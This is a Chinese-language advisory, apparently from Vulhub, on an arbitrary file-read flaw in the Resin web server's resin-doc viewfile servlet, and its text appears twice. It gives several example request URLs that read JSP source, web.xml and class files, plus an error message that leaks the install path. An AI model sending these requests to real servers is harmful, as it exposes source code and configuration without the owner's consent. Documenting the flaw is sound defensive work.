VULHUB ™

Resin是一款由Caucho Technology开发的WEB服务器，可使用在Microsoft Windos操作系统下。 Resin的某个CGI程序实现上存在输入验证漏洞，远程攻击者可能利用此漏洞读取Web主目录下的任意文件，包括JSP源码或类文件。 默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet： http：//targetsystem/resin-doc/viewfile/?contextpath=\\%2Fresin-doc\\%2Fjmx\\%2Ftutorial\\%2Fbasic ＆servletpath=\\%2Findex.xtp ＆file=index.jsp ＆re-marker= ＆re-start= ＆re-end=＃code-highlight viewfile servlet可以无需参数在Web主目录中浏览任意文件： http：//targetsystem/resin-doc/viewfile/?file=index.jsp 攻击者可以设置resin-doc外的上下文路径，读取其他Web主目录的任意文件： http：//targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp ＆servletpath= ＆file=WEB-INF/web.xml 如果系统中安装了resin-doc就可能读取Web主目录中的所有文件，包括类文件，然后可以反编译这些文件浏览Java源代码： http：//targetsystem/resin-doc/viewfile/?contextpath=/ ＆servletpath= ＆file=WEB-INF/classes/com/webapp/app/target.class 请求中错误的路径还会泄漏安装的绝对路径： File not found /C：/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class

Resin是一款由Caucho Technology开发的WEB服务器，可使用在Microsoft Windos操作系统下。 Resin的某个CGI程序实现上存在输入验证漏洞，远程攻击者可能利用此漏洞读取Web主目录下的任意文件，包括JSP源码或类文件。 默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet： http：//targetsystem/resin-doc/viewfile/?contextpath=\\%2Fresin-doc\\%2Fjmx\\%2Ftutorial\\%2Fbasic ＆servletpath=\\%2Findex.xtp ＆file=index.jsp ＆re-marker= ＆re-start= ＆re-end=＃code-highlight viewfile servlet可以无需参数在Web主目录中浏览任意文件： http：//targetsystem/resin-doc/viewfile/?file=index.jsp 攻击者可以设置resin-doc外的上下文路径，读取其他Web主目录的任意文件： http：//targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp ＆servletpath= ＆file=WEB-INF/web.xml 如果系统中安装了resin-doc就可能读取Web主目录中的所有文件，包括类文件，然后可以反编译这些文件浏览Java源代码： http：//targetsystem/resin-doc/viewfile/?contextpath=/ ＆servletpath= ＆file=WEB-INF/classes/com/webapp/app/target.class 请求中错误的路径还会泄漏安装的绝对路径： File not found /C：/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class